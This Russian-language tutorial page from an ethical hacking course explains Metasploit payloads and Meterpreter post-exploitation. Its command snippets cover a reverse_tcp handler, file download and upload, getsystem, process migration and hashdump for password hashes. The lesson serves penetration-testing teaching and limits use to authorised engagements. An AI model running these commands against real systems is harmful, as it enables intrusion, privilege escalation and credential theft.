Полезные нагрузки и Meterpreter
Оболочка после эксплуатации
«Полезные нагрузки и Meterpreter» — бесплатный урок Ethical Hacking Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Ethical Hacking Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Ethical Hacking Academy содержит 4 уроков всего.
Что такое полезная нагрузка
Полезная нагрузка — это код, который выполняется на цели после успешного эксплойта. Она определяет, что Вы сможете делать дальше: от выполнения одной команды до открытия полноценной интерактивной оболочки.
Выбор подходящей полезной нагрузки зависит от ОС цели, сетевой конфигурации и необходимого уровня доступа.
Поэтапные и цельные полезные нагрузки
Полезные нагрузки используют два способа доставки:
- Поэтапная (обратите внимание на
/вmeterpreter/reverse_tcp): сначала отправляется небольшая начальная часть, которая затем загружает полную полезную нагрузку. Начальный объём меньше. - Цельная (обратите внимание на
_вmeterpreter_reverse_tcp): вся полезная нагрузка доставляется сразу. Это надёжнее в нестабильных сетях.
Привязываемые и обратные оболочки
Существуют два направления соединения:
- Привязываемая оболочка: цель открывает порт и ожидает соединения, а Вы подключаетесь к ней. Такие соединения часто блокируются межсетевыми экранами.
- Обратная оболочка: цель подключается обратно к Вам (LHOST/LPORT). Обычно такое соединение проходит через межсетевые экраны, разрешающие исходящий трафик.
По этой причине обратные полезные нагрузки обычно используются по умолчанию.
Знакомство с Meterpreter
Meterpreter — расширенная полезная нагрузка Metasploit. В отличие от простой командной оболочки, она работает в памяти, обменивается данными по зашифрованному каналу и предоставляет богатый набор команд для действий после эксплуатации.
Поскольку она не записывает данные на диск, она менее заметна, чем отдельный исполняемый файл.
Основные команды Meterpreter
Получив сеанс Meterpreter, начните с основных команд, которые помогут сориентироваться в цели.
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationПередача файлов
Meterpreter перемещает файлы между Вашим компьютером и целью с помощью простых команд. Это полезно для получения свидетельств или размещения инструментов во время санкционированных проверок.
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\Переход к системной оболочке
Команда shell переводит Вас из Meterpreter во встроенный интерпретатор команд цели (cmd.exe или /bin/sh), когда необходимо напрямую выполнять команды ОС.
Введите exit, чтобы вернуться к приглашению Meterpreter, не теряя сеанс.
shell
# C:\> whoami
# exit -> back to meterpreterПовышение привилегий
Часто Вы получаете доступ с ограниченными привилегиями. Meterpreter помогает их повысить:
getsystemпытается применить известные методы для получения SYSTEM в Windows.- Модуль после эксплуатации
local_exploit_suggesterрекомендует эксплойты для локального повышения привилегий на узле.
Более высокие привилегии открывают доступ к извлечению учётных данных и более глубокому проникновению.
getsystem
run post/multi/recon/local_exploit_suggesterПеренос процессов
Ваш сеанс находится внутри процесса. Если этот процесс нестабилен или его, скорее всего, завершат, выполните перенос в более стабильный, длительно работающий процесс, чтобы сохранить сеанс активным.
Перенос в процесс, соответствующий Вашему уровню привилегий, также помогает не выделяться и может изменить контекст пользователя.
ps
migrate 1340 # migrate into a stable PIDСохранение доступа
Meterpreter содержит функции для сбора полезных данных во время санкционированных проверок, например hashdump для получения хешей паролей и инструменты keyscan для демонстрации последствий перехвата ввода.
Используйте такие возможности только в согласованных рамках проверки и документируйте всё для отчёта клиента.
hashdump
run post/windows/gather/checkvmОбработчики
Обратной полезной нагрузке требуется процесс, который будет прослушивать соединение с Вашей стороны. Эту роль выполняет модуль multi/handler. Настройте его с теми же полезной нагрузкой, LHOST и LPORT, которые использовались для создания полезной нагрузки.
Это особенно важно, когда Вы доставляете полезную нагрузку msfvenom за пределами консоли: сначала запустите обработчик, затем активируйте полезную нагрузку на цели.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jБыстрая проверка
Выберите полезную нагрузку, которая обходит ограничительный межсетевой экран.
Итоги
Вы изучили полезные нагрузки и Meterpreter:
- Полезные нагрузки могут быть поэтапными (/) или цельными (_), а также привязываемыми или обратными; обратные обычно обходят межсетевые экраны.
- Meterpreter работает в памяти через зашифрованный канал и предоставляет богатый набор команд.
- Основные задачи: sysinfo, getuid, ps, download/upload, shell.
- Повышайте привилегии с помощью getsystem и local_exploit_suggester; используйте migrate для стабильности.
- Используйте функции сбора данных только в согласованных рамках и документируйте всё.
Далее: модули после эксплуатации, перемещение между сетями и сбор ценных данных.
Часто задаваемые вопросы
Урок «Полезные нагрузки и Meterpreter» бесплатный?
Да — полный текст урока «Полезные нагрузки и Meterpreter» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Ethical Hacking Academy, подпишись на CoddyKit PRO. Курс Ethical Hacking Academy содержит 4 уроков всего.
Чему я научусь в уроке «Полезные нагрузки и Meterpreter»?
Оболочка после эксплуатации Ты практикуешь Ethical Hacking Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Ethical Hacking Academy?
Предыдущий опыт не требуется. Ethical Hacking Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.
Сколько времени занимает урок «Полезные нагрузки и Meterpreter»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Ethical Hacking Academy?
Да. Каждый урок Ethical Hacking Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Архитектура Metasploit
- Поиск и использование эксплойтов
- Полезные нагрузки и Meterpreter
- Модули постэксплуатации